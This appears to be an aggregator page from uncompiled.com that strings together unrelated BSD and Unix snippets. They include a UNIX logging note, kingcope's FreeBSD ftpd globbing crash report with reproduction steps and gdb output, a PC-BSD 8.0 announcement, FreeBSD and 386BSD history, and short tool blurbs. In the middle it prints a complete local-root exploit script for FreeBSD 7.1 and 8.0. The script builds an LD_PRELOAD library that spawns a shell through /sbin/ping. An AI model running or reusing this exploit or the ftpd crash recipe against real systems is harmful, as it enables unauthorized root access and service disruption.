uncompiled.com

There are a wide variety of logging functions and services on UNIX. Some of these, such as the Solaris audit facility, are limited to a particular variety of UNIX. It is important that the digital forensics analyst become familiar with the logging deployed on the UNIX system that they are reviewing. In particular, have a look at the syslog configuration file, the “/var/log” and “/var/run” directories and check if there are any remote log servers. Syslog is a network service that is most commonly run locally. This allows for the capability of sharing logs to a remote system.

Source

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its
ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in
popen.c.
I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
glob_t gl;
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
[1] if (glob(argv[argc], flags, NULL, &gl))
gargv[gargc++] = strdup(argv[argc]);
[2] else
[3] for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
pop++)
gargv[gargc++] = strdup(*pop);
globfree(&gl);
}

At [1] glob() is called. if theres a long directory (for example "A" x
200) and a request like described
in "how to repeat this problem" is sent to the ftpd it crashes. My
assumption is because it lands in the
else clause [2], glob doesn't fail but gives back a zeroed out gl
structure. In [3] then there's no check
if pop is null and therefore *pop gets dereferenced which is a null
pointer and the ftpd instance crashes.

Could someone please shed some light into why glob doesn't fail but
gives a zeroed out structure back?

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257
“WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW”
directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
—snip—

on the other side:

—snip—
0×282261e5 in read () at read.S:3
3 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0×0805622c in getline ()
(gdb) i r
eax 0×0 0
ecx 0×0 0
edx 0×0 0
ebx 0xbfbfd911 -1077946095
esp 0xbfbfba70 0xbfbfba70
ebp 0xbfbfcc08 0xbfbfcc08
esi 0×1 1
edi 0xbfbfcbf4 -1077949452
eip 0×805622c 0×805622c
eflags 0×10293 66195
cs 0×33 51
ss 0×3b 59
ds 0×3b 59
es 0×3b 59
fs 0×3b 59
gs 0×1b 27
(gdb) x/10i $eip
0×805622c : mov (%edx),%eax
0×805622e : setle %cl
0×8056231 : mov %ecx,%esi
0×8056233 : test %eax,%eax
0×8056235 : je 0×8056281
0×8056237 : test %cl,%cl
0×8056239 : je 0×8056281
0×805623b : mov %edx,%ebx
0×805623d : mov 0xffffee7c(%ebp),%edx
0×8056243 : lea 0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
eip = 0×805622c in getline; saved eip 0×805047b
called by frame at 0xbfbfcc14
Arglist at 0xbfbfcc08, args:
Locals at 0xbfbfcc08, Previous frame’s sp is 0xbfbfcc10
Saved registers:
ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at
0xbfbfcc04,
eip at 0xbfbfcc0c
(gdb)

Testing program:

—snip—

#include
#include

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

void do_glob() {
glob_t gl;
char **pop;

char buffer[256];
strcpy(buffer, “{A*/../A*/../A*/../A*/../A*/../A*/../A*}”);

int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
if (glob(buffer, flags, NULL, &gl)) {
printf(“GLOB FAILED!\n”);
return 0;
}
else
// for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
printf("glob success");
return 0;
}
globfree(&gl);
}

main(int argc, char **argv) {
do_glob();
do_glob();
}
---snip---

05 March 2010
/kingcope

Source

The PC-BSD Team is pleased to announce the availability of PC-BSD 8.0
(Hubble Edition), running FreeBSD 8.0-RELEASE-P2, and KDE 4.3.5

PC-BSD 8.0 contains a number of enhancements and improvements over the
7.x series. For a full list of changes, please refer to the changelog.
Some of the notable changes are:

* FreeBSD 8.0-RELEASE-P2
* KDE 4.3.5
* Brand new System Installer, allows the install of PC-BSD or FreeBSD
* Run in Live mode directly from DVD
* Updated Software Manager, allows browsing and installing
applications directly via the GUI
* Support for 3D acceleration with NVIDIA drivers on amd64

Version 8.0 of PC-BSD is available for download from our mirrors, and as
torrent from http://www.gotbsd.net.

Download PC-BSD 8.0:

http://www.pcbsd.org/content/view/152/11/

Changelog:

http://www.pcbsd.org/content/view/151/11/

Release Notes

http://www.pcbsd.org/content/view/150/11/

Source

The first free Unix-like operating system available on the IBM PC was 386BSD, of which Linus Torvalds said in 1993: “If 386BSD had been available when I started on Linux, Linux would probably never have happened.”

386BSD was a direct descendant of Bill Joy’s Berkeley Software Distribution, which was the core of SunOS and other proprietary Unix distributions. 386BSD and the patchkit for the port to the Intel chip formed the basis for FreeBSD, NetBSD and OpenBSD, which have carried the torch for BSD and open source Unix to this day.

Lars Wirzenius, a student friend of Linus Torvalds, recalled: “FreeBSD didn’t exist then. 386BSD did, but it wouldn’t have worked on my computer, since it required a 387 co-processor. I used SCO Xenix from fall 1991 to spring or summer of 1992, until Linux matured enough to be a usable environment for writing code.”

Alan Cox tells a similar story. When he saw the 386BSD announce he thought “Woah! – finally there is something worth running on a PC.”

The trouble was that 386BSD needed floating point hardware, and Linux didn’t. “I hadn’t got the floating point chip, which was 70 quid at the time, so I installed Linux,” he said.

386BSD was a long time coming. The first public release (Version 0.0) was on St. Patrick’s Day, 1991, and was barely functional. Most users had to wait until Bastille Day, 1992 for the first functional release (Version 0.1).

A year or two earlier, a couple of small fixes, and Linux may never have seen the light of day.

What ifs

The most popular of the BSDs is FreeBSD. FreeBSD, like the other BSDs, had a 15 year start on Linux, based as it was on BSD Unix, which had played a large part in defining the standards for operating systems and networking that have held good to the present day. For much of its early history, FreeBSD was technically superior to Linux and still retains an enviable reputation for reliability.

So it is interesting to speculate why Linux, and not FreeBSD, became the flag bearer, not only for free software, but for Unix-like operating systems.

BSD had been around for a long time, and Linux grew from small beginnings. Most of the early contributors to Linux and the projects that sprang from the early success of Linux, were hobbyists and students with no great history in computing, yet GNU/Linux, not FreeBSD, was adopted by the traditional Unix companies to become the universal operating system that Unix had promised to be.

Could have been a contender

FreeBSD didn’t stagnate, or lose, and is probably healthier that it ever was, big on networking devices, friendly with web hosting companies and big with Apple, but hasn’t had the impact of Linux on the rest of the computing industry, despite an enviable record for technical excellence.

Any number of reasons can be given for this. During the period 1992-1994, when GNU/Linux was beginning to emerge as a viable option for Intel servers, the BSDs were the subject of a copyright dispute between USL and BSDi, which was indisputably a setback to uptake and development, but the BSDs bounced back from this setback and were the favoured solution for many web and ftp servers during the dotcom boom.

In 1999, “Walnut Creek CD-ROM set the world record for most bytes of network traffic processed in 24 hours by a single host: One single-processor PII box (a then-famous FreeBSD ftp server) handled 1.39 terabytes. (This burst of traffic was, ironically, occasioned by the release on that machine of Slackware 4.0.)”

Source

FreeBSD is the most accessible and popular of the BSDs, has code at the heart of Darwin and Apple’s OS X, and has powered some of the more successful sites on the Web, including Hotmail, Netcraft and Yahoo!, which before the rise of Google was the busiest site on the internet.

FreeBSD rose from the ashes of 386BSD, the original effort to port BSD to the Intel chip, and claims a code lineage that reaches back to Bill Joy’s Berkeley Software Distribution of the late seventies. The 386BSD port was begun in 1989 by Bill and Lynne Jolitz, and was destined to be the original free Unix-like operating system for the IBM PC. The first public release of 386BSD (Version 0.0) was on St. Patrick’s Day, 1991, accompanied by a series of articles in Dr Dobbs journal, which documented the process.

The first functional release of 386BSD was Version 0.1, which was released on Bastille Day, 1992.

FreeBSD emerged in 1993, after the self-imposed task of supporting 386BSD on their own had proved too much for Bill and Lynne Jolitz. The patchkit which had been the underpinning for the BSD port to the 386 was revived and became the basis for the first FreeBSD release.

Source

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c < < _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

execl(“/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env
cat > program.c < < _EOF
#include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system(“echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Source

Last week at Python NYC we open sourced Norc, a task management system that replaces Unix cron. At Perpetually we let anyone archive any web site on any schedule. One of the big challenges we faced early on was to create a flexible, traceable and scalable scheduling system to handle this problem. While cron is great, it’s not geared toward solving this problem: Tasks are tied to a single computer, and they’re managed independently for each host and user from the command line. In addition, with cron we’d have to build all sorts of infrastructure to handle error reporting, logging, etc. So there was a clear need for something better.

Source

Compleat is an easy, declarative way to add smart tab completion for any command. It’s written in Haskell (but requires no programming knowledge).

With Compleat, you can add completion for any command just by writing a usage description and saving it in a configuration folder. The ten-line description of the android command above generates the same results as my 76-line bash function, and it’s so much easier to write and understand!

Source

printf(1) formats and prints its arguments, after the first, under control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences which are converted and copied to the standard output, and format specifications, each of which causes printing of the next successive argument.

Source